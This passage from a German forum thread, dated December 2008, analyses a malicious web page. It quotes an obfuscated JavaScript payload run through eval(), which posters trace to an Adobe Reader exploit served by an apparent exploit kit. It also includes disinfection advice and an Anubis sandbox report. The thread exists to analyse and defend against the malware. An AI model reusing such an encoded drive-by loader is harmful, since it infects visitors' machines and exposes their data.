oUzUu6tTpQVJ('jLA4oY9efw93bRh3f8K43ccN@YLNRSpaRQ_n6tt2RQ_n6tt2RQ_n6tt2RQ_2Mc9JRQQ26QqJRQCnfke1RQ_1jTe1RQ_1jqK2RQ87Mmt2RQ87ztt2RQ87WxeJRQ871qKnRQC7McrJRQC7Mx97RQ_1WZq7RQ_7MbK7RQ87Mc97RQCnVQ97RQ876C97RQ81Mx1nRQ_nzFr2RQ81Mx1nRQCnZcrnRQ87Mpt2RQ87Mc9JRQCnVQ97RQCJSqt2RQCny1tnRQ87yCe2RQ_2vqt2RQ87MYK2RQ87Mc97RQ8JxxqnRQCJSQ9JRQQnv1tnRQCnuCK2RQ_2vQe2RQ87MYq7RQ87Mc97RQ8JxxqnRQCJSQrnRQQJxStnRQ82jQq7RQ_2vT17RQ87Mp17RQ87Mc97RQ8JxxqnRQCJSQr2RQ_2j1tnRQ_2MBK2RQ_2v1q7RQ87MmqJRQ87Mc97RQ8JxxqnRQCJSF97RQC2ZStnRQ_2xLqnRQ_2vQtnRQ87MBK1RQ87Mc97RQ8JxxqnRQ8JMx9JRQ_7vFq7RQ81xBtJRQCnfCKnRQC7vCeJRQ871qqnRQ87Mce7RQCJyQ97RQ81xxqnRQCnVk9JRQ87WYeJRQ87ZSKnRQCnVT9nRQC7vTeJRQ_2vTe1RQ87Mx1nRQ87Mc97RQ_1vT97RQC7ute1RQ81Mmi2RQQn1qtnRQ87Mc97RQCnfQ97RQC76CeJRQC2xx1nRQC2MxtJRQCnfT97RQQJMYeJRQ82j1tnRQ87Mc97RQCJMc97RQ8Jxx1nRQ_1uF9JRQCJfQi7RQCJxx1nRQ_2vFrnRQ87MSK7RQ87Mc97RQ8JxcrJRQC21k97RQCJ6Q97RQQJy_K2RQC211KJRQ87WY97RQ_1xLtnRQ87Mc97RQ81xY12RQCnVk97RQ876CeJRQ87ZSKnRQCnVT9nRQC7vTeJRQ8JMptnRQ87Mc97RQ_1uQ97RQCJvQi1RQ8JxcrJRQ_7Im9JRQCJIm1nRQ82jTrJRQQJMLKJRQCJIB97RQ8Jxx1nRQ_1uFr2RQCJfQeJRQCJxx1nRQ_2vFrnRQ87MmrJRQ87Mc97RQ87MSKnRQ81xY12RQCnVk97RQ87vCeJRQ87sSKnRQCnVT9nRQC7vTeJRQC7MptnRQ87Mc97RQ_1uQ97RQCnVC12RQC7MYeJRQ87ZSKnRQCnVT9nRQC7vTeJRQ87MptnRQ87Mc97RQ8JZc97RQCJsBinRQ_2ZcrJRQ_2ZcrJRQ_2ZcrJRQ_2ZcrJRQ_26FtJRQCJuQ9JRQCnVTrJRQ_2smKnRQCJsY11RQ_2MY12RQCnVTeJRQCnVqt2RQ87v_q2RQCJzF1nRQCJSQr2RQ81Ix1nRQCnVtr2RQC7y_qJRQ87ILtnRQCJSCtJRQ81SF1nRQ87Im97RQ_7IYtJRQ8JfTqnRQ_nzCe7RQC2IcrJRQ_7IBe1RQ87jCK1RQC7McK2RQ82sbenRQ87v_qJRQC2yTK7RQ87Ic92RQ8JMY17RQ82Zp1nRQ82ytinRQ81xBe2RQCJuqKJRQ_2VF1nRQCJuF1nRQ87Im9JRQ_1Skq2RQ876F1nRQCnVCinRQC76TenRQQ2zQrJRQ87Wx1nRQ87Ix1nRQCJyTKJRQC2sB92RQ87McrnRQ82WptnRQ82jCK2RQCJxY12RQ8J6Ti7RQ8JjC92RQ87MYe2RQQnVF11RQQnjs1nRQC2MmKJRQQnfTq7RQCnVFK1RQQ2jFKnRQCnMZ12RQQnVsq2RQCnIxK2RQCn6TK7RQCnsxq7RQCnZBq7RQQnvFKnRQC2MZt2RQCnMxtJRQCnVFK2RQQnjTK7RQQnjF11o_b1OF83zpS4Sxc8lch@u8L1NY_1chK43ccN@YLNRSpaRQ_2xpKJRQ_2xpKJo_b1fYYNOOhhLT12nF83zppe7hqhhuSNpZC3xxY4QBhGeYYn3Khe3ZL4Kut4KLLhRSS4Sxc8lch@u8L1NY_1clShRlceVSLSJZh_VLCe4YhemcKh1jhN18r_Lt8KJuh3Rc3nhSq8ySKRnF83zpphhBYNLt8KJuh3Rc3nhSq8ySKR3k84om_4zLYh7SS28FcewVq4lB_a6b887h14Sxc8lch@u8L1NY_1clbNuBcNVB883ZL_jKS4Sxc8lch@u8L1NY_1clShRlceVShLJZh_ns_8wwheKk_4wZYL8cYh7b_84Fce_q1Kfq12jqK_6b887htNVLce4k_4wZc_3hY3zuq4lB_alBCNhhqhRZ_axBCNlL__wVqeeB__wy8SjVK82wK2zq12n_YK4Vw_nYYNzhcOwy8lLk_4wZc_jLA4oY9efw93bRh3f8C4lB_aBycGxx8RkLChSZhSoCq2STb_o_K1S_K1S_K1oVpaS_K1S_qa4Tw1S_K1oVpa111111111Tb_o1111111111111111111111111111111111111111Tb_o11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111oVpa11111111111111111111111111111111111111111111111111111111oVpa1111111111111111111111111111111111111111111111qa4TS11111111111111111oVpa1111111111111111111111111Tb_o1111111111111111111oVK4VLLh3qCNwlL4JSpaRtKnjq12JBSLBycGxx8RkLChSZh_nFh43mL4wRYhO8Lo8x9nDp__wqbKOF83zpS@uZ31GpwSOOhevpwJzB83SSw_nqpeulc3VLch3pSh2xrnpmi8KTLeut546bq27u9oUyaLOQLoMyCGhSt4SGr4rc3@wqbKOs_8wwheO1p3Gc1@fm_nzscGUB5O3Khe3ZL4Kyp2_QLoMyCGhSt4SGr4rc3@wVC3Gc1@fm_nzscGUB5OOVwSOTLeut546bq27u9oUyA1Lpp3Gc1@fm_nzscGUB5OO81aobhnkxQNVTteHB5oPlbNuBcNVB883ZL_jKweTx9KXhL1vLtRvRe@mRp2wV1azcL4uBChOTLeut546bq27u9oUyA1O8_aJcCh@b88elLabbroyS948Sw_OV_afYYNOQ5hyye7bmQ8tLe20BhhO81aj1_2@pt3jkL2@u1afYYNOt54hc5Gty84mbiaLqw43ccN@YLNRSpaRQ_n6tt2RQ_n6tt2RQ_n6tt2RQ_2Mc9JRQQ26QqJRQCnfke1RQ_1jTe1RQ_1jqK2RQ87Mmt2RQ87ztt2RQ87WxeJRQ871qKnRQC7McrJRQC7Mx97RQ_1WZq7RQ_7MbK7RQ87Mc97RQCnVQ97RQ876C97RQ81Mx1nRQ_nzFr2RQ81Mx1nRQCnZcrnRQ87Mpt2RQ87Mc9JRQCnVQ97RQCJSqt2RQCny1tnRQ87yCe2RQ_2vqt2RQ87MYK2RQ87Mc97RQ8JxxqnRQCJSQ9JRQQnv1tnRQCnuCK2RQ_2vQe2RQ87MYq7RQ87Mc97RQ8JxxqnRQCJSQrnRQQJxStnRQ82jQq7RQ_2vT17RQ87Mp17RQ87Mc97RQ8JxxqnRQCJSQr2RQ_2j1tnRQ_2MBK2RQ_2v1q7RQ87MmqJRQ87Mc97RQ8JxxqnRQCJSF97RQC2ZStnRQ_2xLqnRQ_2vQtnRQ87MBK1RQ87Mc97RQ8JxxqnRQ8JMx9JRQ_7vFq7RQ81xBtJRQCnfCKnRQC7vCeJRQ871qqnRQ87Mce7RQCJyQ97RQ81xxqnRQCnVk9JRQ87WYeJRQ87ZSKnRQCnVT9nRQC7vTeJRQ_2vTe1RQ87Mx1nRQ87Mc97RQ_1vT97RQC7ute1RQ81Mmi2RQQn1qtnRQ87Mc97RQCnfQ97RQC76CeJRQC2xx1nRQC2MxtJRQCnfT97RQQJMYeJRQ82j1tnRQ87Mc97RQCJMc97RQ8Jxx1nRQ_1uF9JRQCJfQi7RQCJxx1nRQ_2vFrnRQ87MSK7RQ87Mc97RQ8JxcrJRQC21k97RQCJ6Q97RQQJy_K2RQC211KJRQ87WY97RQ_1xLtnRQ87Mc97RQ81xY12RQCnVk97RQ876CeJRQ87ZSKnRQCnVT9nRQC7vTeJRQ8JMptnRQ87Mc97RQ_1uQ97RQCJvQi1RQ8JxcrJRQ_7Im9JRQCJIm1nRQ82jTrJRQQJMLKJRQCJIB97RQ8Jxx1nRQ_1uFr2RQCJfQeJRQCJxx1nRQ_2vFrnRQ87MmrJRQ87Mc97RQ87MSKnRQ81xY12RQCnVk97RQ87vCeJRQ87sSKnRQCnVT9nRQC7vTeJRQC7MptnRQ87Mc97RQ_1uQ97RQCnVC12RQC7MYeJRQ87ZSKnRQCnVT9nRQC7vTeJRQ87MptnRQ87Mc97RQ8JZc97RQCJsBinRQ_2ZcrJRQ_2ZcrJRQ_2ZcrJRQ_2ZcrJRQ_26FtJRQCJuQ9JRQCnVTrJRQ_2smKnRQCJsY11RQ_2MY12RQCnVTeJRQCnVqt2RQ87v_q2RQCJzF1nRQCJSQr2RQ81Ix1nRQCnVtr2RQC7y_qJRQ87ILtnRQCJSCtJRQ81SF1nRQ87Im97RQ_7IYtJRQ8JfTqnRQ_nzCe7RQC2IcrJRQ_7IBe1RQ87jCK1RQC7McK2RQ82sbenRQ87v_qJRQC2yTK7RQ87Ic92RQ8JMY17RQ82Zp1nRQ82ytinRQ81xBe2RQCJuqKJRQ_2VF1nRQCJuF1nRQ87Im9JRQ_1Skq2RQ876F1nRQCnVCinRQC76TenRQQ2zQrJRQ87Wx1nRQ87Ix1nRQCJyTKJRQC2sB92RQ87McrnRQ82WptnRQ82jCK2RQCJxY12RQ8J6Ti7RQ8JjC92RQ87MYe2RQCnSkq7RQQ2sx1nRQQn6TqnRQCnIZ12RQQ2Vk17o_b1OF83zpS4jbANvKLaLqS21b12jq12jV1afYYNOQCRRwY4PS3oO81akx8hmyiG2c8@slShRlceVSLaNqp2nqp4lB_aRp572yeh1s81rZQRmcaaLqS4jbANvKLahqS_ulee8xCOqYA_j1Q21_b1OF83zpp3Gc1@fm_nzscGUB5OO81aulhe6mh3jcL_oQw4SqK1jQw4SqK1jTw_nqp3Gc1@fm_nzscGUB5OO81a8yC7v_AJKSp3Gc1@fm_nzscGUB5O8qweTx9KXhL1vLtRvRe@mLb1OF83zpboBlYGGp1eSk58euc3O81aKQ5hyye7bmQ8tLe20BhhO8Saj1_njq12jqK_et_NkmQn8u1aJRYNO1p4lB_aJx3GvFLGVZ3SjVqeELrnJSi4DwtoBlYGGp1eSk58euc3nFY@bZqetbQ@4Vw_OV_akcQ@StcOJx3GvFLGVZ3lO81aobhnkxQNVTteHB5oPpb_Ot54hc5Gty84mbr1O8_aLppeulc3VLch3pw84Brh@Se3mSw_OV_afYYNO8L2TcC81ur3huLovG9OO81alp_N3F88RZ8ezx3ezm88elYLVRcoVB883ZL_wV1ahp1ouyLKHmhh4pAnryaaLqwhjq34NSQG@hc8TZtRPlpNRp_hlmheKGSlsRbe8TpawV1afYYNOsQ2khehv1L1zm_aLqphRZ_axBCNlL__hp1ouyLKHmhh4pAnry5L@Sh3zYi4KqK_88L2TcC81ur3huLovG9O3kL8lB8JVSw2wKwhjq34NSQG@hc8TZtRPlb3KYYNxb__z_w_nqw8JpS_KsQ2khehv1L1zmQOj8aaL81a1qpiJqS_KsQ2khehv1L1zmQOy8aaL81ayqpiJqb46t3RhZ181TQNdBKlOK1az_Sa_w_avm1@chcnKSqN6u32YpSSOCK_wqSw_pS_vm1@chcnKSqN6ua2YpwSLqbnOFpiOsQ2khehv1L1zmQOy8aa_qw2wqSw_pS_vm1@chcnKSqN6ua2YpSSOsK_wqbKO_i7gY_GfwL_wV1afYYNOt8JqL_NELq7TpwSOQChRmQ3lp8eKTwiupt3jkhiupt3jkYawV1avSh88cL_VYiOSpC@SFio3Khe3ZL4KpSSOt1nSQq2wqS4xS3Kjx31Mpaa481aVYiOSpC@SFionqS4KLcN3kch8wh3oma4eB8eO81aIRLh8YY33kch8whe@b87hYh88L9hJRL_nm84oyY1OTpa88cN7y1aVYiOSpC@SFioLLb1O8_aLpw84Brh@Se3mSw_nqww');" );
                    
    bcTm3E = VgYbPlrsoUtZB ( ghVLJIEqm5Yq );
                    eval(
    bcTm3E );
    (Ich hab schon den \ Müll entfernt)
    Wie gesagt diese Funktionen dienen nur zum Entschlüsseln eines weiteren Javascripts:
    No File | xup.in

    Und das Script entschlüsselt das finale exploit script:
    Frubar Paste

    Dieses Script lässt sich jetzt diesem Exploit zuordnen:
    http://www.securityfocus.com/bid/27641/info

    Was der Shellcode in dem Exploit genau macht lässt sich leider nicht so einfach rausfinden.

    Neben dem pdf wird auch noch eine SWF Datei aufgerufen, da könnte auch nochmal ein Exploit drin sein:
    Code:
    GET /news/files/swf.swf HTTP/1.1
    Host: vide0portal.com
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.3) Gecko/2008092417
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip,deflate
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
    Keep-Alive: 300
    Connection: keep-alive
    Referer: http://vide0portal.com/news/index.php
    Auf dem Server läuft mit Sicherheit ein Exploit-Kit. Je nachdem mit was der User auf die Webseite geht werden eben ein paar Exploits ausgepackt. Es kann also sein das noch viel mehr Exploits auf der Webseite schlummern und nur auf den richtigen Browser und das richtige OS warten.
    Um sich ein bisschen vor solchen Exploit-Kits zu schützen ist es deshalb sehr ratsam den verräterischen Browser-User-Agent zu ändern. Wie steht auf wiki User_Agent
     
  15. #14 30. Dezember 2008
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    Hammer geil,
    Ihr seid echt die Besten ^^

    Also hat mir NoScript mal das "Leben" gerettet, wenn es wie du sagst ein JavaScript war.

    Aber was ich net kapier, wenn es NoScript blockt wieso konnte dann mein firefox auf einmal so rumspinnen, dass er sich aufhängt etc. wenn doch kein Script gestartet wurde.

    Und wieso kann ich mein ebay PW net ändern :(

    Ist immernoch der Scheiß das ich nach dem ändern in MeinEbay reinkomme, das PW ist aber immernoch gleich und ne e-mail krieg ich auch net :(

    BW sind raus

    VIELEN DANK!!!
     
  16. #15 30. Dezember 2008
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    NoScript bringt in diesem Fall eigentlich nichts, weil es ein Adobe Reader Exploit ist. Wenn du dieses PDF File mit einem angreifbaren Adobe Reader (steht da welche das genau sind: Adobe Acrobat and Reader Multiple Arbitrary Code Execution and Security Vulnerabilities ) geöffnet hast (der Reader öffnet sich ja automatisch im Browser) dann bist du infiziert.
    Vielleicht mal hijackthis laufen lassen oder Antivirenscanner suchen lassen.
     
  17. #16 30. Dezember 2008
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    joa ich hab kein Adobe Reader installiert sondern den Foxit PDF Reader, deswegen hab ich ja eig. Glück gehabt :)

    Aber so wie ich es verstanden hätte, öffnet das JavaScript die PDF, aber war anscheinend falsch, zusätzlich zum Script noch die pdf. (und ne swf).
     
  18. #17 30. Dezember 2008
    Zuletzt von einem Moderator bearbeitet: 14. April 2017
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    Also ich habs dummerweise ja probiert und bin evtl. infiziert.
    Seit dem bekomm ich einen Error bei Hijackthis.
    Also er erstellt alles aber bei
    O15 oder O23 kommt dann :
    [​IMG]

    was soll ich machen ^^
     
  19. #18 30. Dezember 2008
    Zuletzt von einem Moderator bearbeitet: 14. April 2017
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    lass mal nen Virenscan durchlaufen!

    Hast du Adobe oder was anderes um pdf dateien zu lesen?

    Bleibt dann noch die Scheiß swf ^^
    Also bei nem Virenscan hat der bei mir über 20 Viren und Trojaner gefunden und ich denk mal jetzt bin ich clean ^^ hab auch nach rootkits gesucht gehabt nix und Spyware ist auch nix hier.
     
  20. #19 30. Dezember 2008
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    Hab Adobe Photoreader :/
    naja ich lass ma durchlaufen
    bis jetzt nur aeq hacks gefunden als viren ^^
     
  21. #20 30. Dezember 2008
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    Anubis: Analyzing Unknown Binaries

    Spoiler
    ___ __ _
    + /- / | ____ __ __/ /_ (_)____ -\ +
    /s h- / /| | / __ \/ / / / __ \/ / ___/ -h s\
    oh-:d/ / ___ |/ / / / /_/ / /_/ / (__ ) /d:-ho
    shh+hy- /_/ |_/_/ /_/\__,_/_.___/_/____/ -yh+hhs
    -:+hhdhyys/- -\syyhdhh+:-
    -//////dhhhhhddhhyss- Analysis Report -ssyhhddhhhhhd\\\\\\-
    /++/////oydddddhhyys/ ooooooooooooooooooooo \syyhhdddddyo\\\\\++\
    -+++///////odh/- -+hdo\\\\\\\+++-
    +++++++++//yy+/: :\+yy\\+++++++++
    /+soss+sys//yyo/os++o+: :+o++so\oyy\\sys+ssos+\
    +oyyyys++o/+yss/+/oyyyy: :yyyyo\+\ssy+\o++syyyyo+
    +oyyyyyyso+os/o/+yyyyyy/ \yyyyyy+\o\so+osyyyyyyo+


    [#############################################################################]
    Analysis Report for http://vide0portal.com/news/index.php
    [#############################################################################]

    Summary:
    - Changes security settings of Internet Explorer:
    This system alteration could seriously affect safety surfing the World
    Wide Web.

    - Performs File Modification and Destruction:
    The executable modifiesand destructs files which are not temporary.

    - Performs Registry Activities:
    The executable reads and modifies registry values. It also creates and
    monitors registry keys.

    [=============================================================================]
    Table of Contents
    [=============================================================================]

    - General information
    - iexplore.exe
    a) Registry Activities
    b) File Activities
    c) Process Activities
    d) Network Activities
    e) Other Activities


    [#############################################################################]
    1. General Information
    [#############################################################################]
    [=============================================================================]
    Information about Anubis' invocation
    [=============================================================================]
    Time needed: 241 s
    Report created: 12/30/08, 21:21:51 UTC
    Termination reason: Timeout
    Program version: 1.67.0

    [=============================================================================]
    Global Network Activities
    [=============================================================================]
    [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    Unknown UDP Traffic:
    [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    From ANUBIS:1026 to 192.168.0.1:53
    State: [ Normal establishment and termination ],
    Outbound Bytes: [ 33 ], Inbound Bytes: [ 128 ]



    [#############################################################################]
    2. iexplore.exe
    [#############################################################################]
    [=============================================================================]
    General information about this executable
    [===]
    Analysis Reason: Primary Analysis Subject
    Filename: iexplore.exe
    Command Line: "C:\Programme\Internet Explorer\iexplore.exe" http://vide0portal.com/news/index.php
    Process-status
    at analysis end: alive
    Exit Code: 0

    [===]
    Load-time Dlls
    [===]
    Module Name: [ C:\WINDOWS\System32\ntdll.dll ],
    Base Address: [0x77F40000 ], Size: [0x000B0000 ]
    Module Name: [ C:\WINDOWS\system32\kernel32.dll ],
    Base Address: [0x77E40000 ], Size: [0x000F7000 ]
    Module Name: [ C:\WINDOWS\system32\msvcrt.dll ],
    Base Address: [0x77BE0000 ], Size: [0x00053000 ]
    Module Name: [ C:\WINDOWS\system32\USER32.dll ],
    Base Address: [0x77D10000 ], Size: [0x0008D000 ]
    Module Name: [ C:\WINDOWS\system32\GDI32.dll ],
    Base Address: [0x77C40000 ], Size: [0x00040000 ]
    Module Name: [ C:\WINDOWS\system32\ADVAPI32.dll ],
    Base Address: [0x77DA0000 ], Size: [0x0009A000 ]
    Module Name: [ C:\WINDOWS\system32\RPCRT4.dll ],
    Base Address: [0x77C90000 ], Size: [0x00075000 ]
    Module Name: [ C:\WINDOWS\system32\SHLWAPI.dll ],
    Base Address: [0x772A0000 ], Size: [0x00063000 ]
    Module Name: [ C:\WINDOWS\System32\SHDOCVW.dll ],
    Base Address: [0x76970000 ], Size: [0x00149000 ]
    Module Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a\comctl32.dll ],
    Base Address: [0x71950000 ], Size: [0x000E4000 ]

    [===]
    Run-time Dlls
    [===]
    Module Name: [ C:\WINDOWS\System32\wsock32.dll ],
    Base Address: [0x00C40000 ], Size: [0x00009000 ]
    Module Name: [ C:\WINDOWS\System32\WS2_32.dll ],
    Base Address: [0x00C50000 ], Size: [0x00015000 ]
    Module Name: [ C:\WINDOWS\System32\WS2HELP.dll ],
    Base Address: [0x00C70000 ], Size: [0x00008000 ]
    Module Name: [ C:\WINDOWS\System32\wshtcpip.dll ],
    Base Address: [0x00C80000 ], Size: [0x00008000 ]
    Module Name: [ C:\WINDOWS\system32\mswsock.dll ],
    Base Address: [0x00EA0000 ], Size: [0x0003C000 ]
    Module Name: [ C:\WINDOWS\System32\UxTheme.dll ],
    Base Address: [0x5B0F0000 ], Size: [0x00034000 ]
    Module Name: [ C:\Programme\Java\jre1.6.0_07\bin\ssv.dll ],
    Base Address: [0x6D7C0000 ], Size: [0x0007B000 ]
    Module Name: [ C:\WINDOWS\System32\NETAPI32.dll ],
    Base Address: [0x71BA0000 ], Size: [0x0004F000 ]
    Module Name: [ C:\WINDOWS\System32\sensapi.dll ],
    Base Address: [0x72240000 ], Size: [0x00005000 ]
    Module Name: [ C:\WINDOWS\System32\browselc.dll ],
    Base Address: [0x723C0000 ], Size: [0x00013000 ]
    Module Name: [ C:\WINDOWS\System32\MSLS31.DLL ],
    Base Address: [0x74640000 ], Size: [0x00027000 ]
    Module Name: [ C:\WINDOWS\System32\msimtf.dll ],
    Base Address: [0x74670000 ], Size: [0x00029000 ]
    Module Name: [ C:\WINDOWS\System32\MSCTF.dll ],
    Base Address: [0x746A0000 ], Size: [0x0004B000 ]
    Module Name: [ C:\WINDOWS\System32\mlang.dll ],
    Base Address: [0x746F0000 ], Size: [0x0008F000 ]
    Module Name: [ C:\WINDOWS\System32\mshtml.dll ],
    Base Address: [0x74790000 ], Size: [0x002AD000 ]
    Module Name: [ C:\WINDOWS\system32\USERENV.dll ],
    Base Address: [0x75A10000 ], Size: [0x000A5000 ]
    Module Name: [ C:\WINDOWS\System32\jscript.dll ],
    Base Address: [0x75BF0000 ], Size: [0x00091000 ]
    Module Name: [ C:\WINDOWS\System32\SXS.DLL ],
    Base Address: [0x75E30000 ], Size: [0x000A2000 ]
    Module Name: [ C:\WINDOWS\system32\appHelp.dll ],
    Base Address: [0x75EE0000 ], Size: [0x0001D000 ]
    Module Name: [ C:\WINDOWS\System32\BROWSEUI.dll ],
    Base Address: [0x75F20000 ], Size: [0x000FC000 ]
    Module Name: [ C:\WINDOWS\system32\urlmon.dll ],
    Base Address: [0x76090000 ], Size: [0x00078000 ]
    Module Name: [ C:\WINDOWS\System32\shdoclc.dll ],
    Base Address: [0x76110000 ], Size: [0x0008E000 ]
    Module Name: [ C:\WINDOWS\system32\WININET.dll ],
    Base Address: [0x761A0000 ], Size: [0x00098000 ]
    Module Name: [ C:\WINDOWS\system32\MSASN1.dll ],
    Base Address: [0x76240000 ], Size: [0x0000F000 ]
    Module Name: [ C:\WINDOWS\system32\CRYPT32.dll ],
    Base Address: [0x76260000 ], Size: [0x0008B000 ]
    Module Name: [ C:\WINDOWS\System32\IMM32.DLL ],
    Base Address: [0x76330000 ], Size: [0x0001A000 ]
    Module Name: [ C:\WINDOWS\System32\CSCDLL.dll ],
    Base Address: [0x765A0000 ], Size: [0x0001B000 ]
    Module Name: [ C:\WINDOWS\System32\cscui.dll ],
    Base Address: [0x765C0000 ], Size: [0x00050000 ]
    Module Name: [ C:\WINDOWS\System32\SETUPAPI.dll ],
    Base Address: [0x76620000 ], Size: [0x000E5000 ]
    Module Name: [ C:\WINDOWS\System32\shfolder.dll ],
    Base Address: [0x76730000 ], Size: [0x00008000 ]
    Module Name: [ C:\WINDOWS\System32\WINMM.dll ],
    Base Address: [0x76AF0000 ], Size: [0x0002D000 ]
    Module Name: [ C:\WINDOWS\System32\rtutils.dll ],
    Base Address: [0x76E40000 ], Size: [0x0000D000 ]
    Module Name: [ C:\WINDOWS\System32\rasman.dll ],
    Base Address: [0x76E50000 ], Size: [0x00011000 ]
    Module Name: [ C:\WINDOWS\System32\TAPI32.dll ],
    Base Address: [0x76E70000 ], Size: [0x0002A000 ]
    Module Name: [ C:\WINDOWS\System32\RASAPI32.DLL ],
    Base Address: [0x76EA0000 ], Size: [0x00037000 ]
    Module Name: [ C:\WINDOWS\System32\DNSAPI.dll ],
    Base Address: [0x76EE0000 ], Size: [0x00025000 ]
    Module Name: [ C:\WINDOWS\system32\WLDAP32.dll ],
    Base Address: [0x76F20000 ], Size: [0x0002D000 ]
    Module Name: [ C:\WINDOWS\System32\Secur32.dll ],
    Base Address: [0x76F50000 ], Size: [0x00010000 ]
    Module Name: [ C:\WINDOWS\System32\winrnr.dll ],
    Base Address: [0x76F70000 ], Size: [0x00007000 ]
    Module Name: [ C:\WINDOWS\System32\rasadhlp.dll ],
    Base Address: [0x76F80000 ], Size: [0x00005000 ]
    Module Name: [ C:\WINDOWS\System32\CLBCATQ.DLL ],
    Base Address: [0x76F90000 ], Size: [0x00078000 ]
    Module Name: [ C:\WINDOWS\System32\COMRes.dll ],
    Base Address: [0x77010000 ], Size: [0x000D3000 ]
    Module Name: [ C:\WINDOWS\system32\OLEAUT32.dll ],
    Base Address: [0x770F0000 ], Size: [0x0008B000 ]
    Module Name: [ C:\WINDOWS\system32\ole32.dll ],
    Base Address: [0x77180000 ], Size: [0x0011A000 ]
    Module Name: [ C:\WINDOWS\system32\comctl32.dll ],
    Base Address: [0x77310000 ], Size: [0x0008B000 ]
    Module Name: [ C:\WINDOWS\system32\SHELL32.dll ],
    Base Address: [0x773A0000 ], Size: [0x007FE000 ]
    Module Name: [ C:\WINDOWS\system32\VERSION.dll ],
    Base Address: [0x77BD0000 ], Size: [0x00007000 ]
    Module Name: [ C:\Programme\Java\jre1.6.0_07\bin\MSVCR71.dll ],
    Base Address: [0x7C340000 ], Size: [0x00056000 ]

    [===]
    2.a) iexplore.exe - Registry Activities
    [===]
    [=-=]
    Registry Values Read:
    [=-=]
    Key: [ HKLM\SYSTEM\CurrentControlSet\Control\Session Manager ],
    Value Name: [ CriticalSectionTimeout ], Value: [ 2592000 ], 1 time
    Key: [ HKLM\SYSTEM\CurrentControlSet\Services\Winsock\Parameters ],
    Value Name: [ Transports ], Value: [ 0x5400630070006900700000004e0065007400420049004f00530000000000 ], 2 times
    Key: [ HKLM\SYSTEM\Setup ],
    Value Name: [ OsLoaderPath ], Value: [ \ ], 2 times
    Key: [ HKLM\SYSTEM\Setup ],
    Value Name: [ SystemPartition ], Value: [ \Device\HarddiskVolume1 ], 2 times
    Key: [ HKLM\Software\Microsoft\Internet Explorer\URL Compatibility\~/CONNWIZ.HTM ],
    Value Name: [ Compatibility Flags ], Value: [ 4 ], 1 time
    Key: [ HKLM\Software\Microsoft\Internet Explorer\URL Compatibility\~/CWIZINTR.HTM ],
    Value Name: [ Compatibility Flags ], Value: [ 4 ], 1 time
    Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion ],
    Value Name: [ DevicePath ], Value: [ %SystemRoot%\inf ], 1 time
    Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths\ICWCONN1.EXE ],
    Value Name: [ Path ], Value: [ C:\Programme\Internet Explorer\Connection Wizard; ], 1 time
    Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Setup ],
    Value Name: [ DriverCachePath ], Value: [ %SystemRoot%\Driver Cache ], 2 times
    Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Setup ],
    Value Name: [ ServicePackSourcePath ], Value: [ D:\ ], 2 times
    Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Setup ],
    Value Name: [ SourcePath ], Value: [ D:\ ], 2 times
    Key: [ HKLM\System\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick\Winmm ],
    Value Name: [ wheel ], Value: [ 1 ], 1 time
    Key: [ HKLM\System\CurrentControlSet\Control\ProductOptions ],
    Value Name: [ ProductType ], Value: [ WinNT ], 1 time
    Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\WPA\PnP ],
    Value Name: [ seed ], Value: [ 3051945280 ], 1 time
    Key: [ HKLM\System\CurrentControlSet\Services\LDAP ],
    Value Name: [ LdapClientIntegrity ], Value: [ 1 ], 1 time
    Key: [ HKLM\System\CurrentControlSet\Services\Tcpip\Parameters ],
    Value Name: [ UseDomainNameDevolution ], Value: [ 1 ], 1 time
    Key: [ HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock ],
    Value Name: [ HelperDllName ], Value: [ %SystemRoot%\System32\wshtcpip.dll ], 1 time
    Key: [ HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock ],
    Value Name: [ Mapping ], Value: [ 0x0b0000000300000002000000010000000600000002000000010000000000 ], 1 time
    Key: [ HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock ],
    Value Name: [ MaxSockaddrLength ], Value: [ 16 ], 1 time
    Key: [ HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock ],
    Value Name: [ MinSockaddrLength ], Value: [ 16 ], 1 time
    Key: [ HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock ],
    Value Name: [ UseDelayedAcceptance ], Value: [ 0 ], 1 time
    Key: [ HKU\S-1-5-21-1343024091-1292428093-1606980848-500\Keyboard Layout\Toggle ],
    Value Name: [ Language Hotkey ], Value: [ 1 ], 2 times
    Key: [ HKU\S-1-5-21-1343024091-1292428093-1606980848-500\Keyboard Layout\Toggle ],
    Value Name: [ Layout Hotkey ], Value: [ 2 ], 2 times
    Key: [ HKU\S-1-5-21-1343024091-1292428093-1606980848-500\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ],
    Value Name: [ Local Settings ], Value: [ %USERPROFILE%\Lokale Einstellungen ], 1 time
